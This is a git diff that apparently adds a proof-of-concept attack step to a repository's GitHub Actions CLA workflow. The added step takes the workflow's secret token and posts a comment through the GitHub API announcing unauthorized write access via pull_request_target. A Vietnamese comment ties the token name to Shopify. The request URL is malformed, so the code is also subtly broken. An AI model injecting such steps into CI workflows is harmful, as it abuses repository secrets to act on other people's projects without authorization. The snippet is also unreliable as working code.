diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index bc975ea..3bf3a2e 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -33,3 +33,14 @@ jobs:
         with:
           github-token: ${{ secrets.token }}
           cla-token: ${{ secrets.cla-token }}
+      - name: Proof of Concept Impact
+        env:
+          # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
+          GH_TOKEN: ${{ secrets.token }}
+        run: |
+          curl -L -X POST \
+          -H "Authorization: Bearer $GH_TOKEN" \
+          -H "Accept: application/vnd.github+json" \
+          "https://github.com{{ github.event.pull_request.number }}/comments" \
+          -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'
+